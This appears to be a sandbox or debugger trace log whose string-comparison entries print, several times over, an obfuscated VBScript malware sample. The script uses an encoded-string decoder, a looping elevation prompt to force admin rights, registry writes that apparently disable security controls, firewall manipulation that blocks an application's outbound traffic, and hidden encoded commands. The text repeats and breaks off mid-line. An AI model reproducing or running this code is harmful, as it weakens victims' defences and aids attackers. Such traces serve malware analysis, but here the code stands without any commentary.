bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.995] wcsncmp (_String1="ules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.995] wcsncmp (_String1="les\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.995] wcsncmp (_String1="es\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.995] wcsncmp (_String1="s\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.995] wcsncmp (_String1="\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 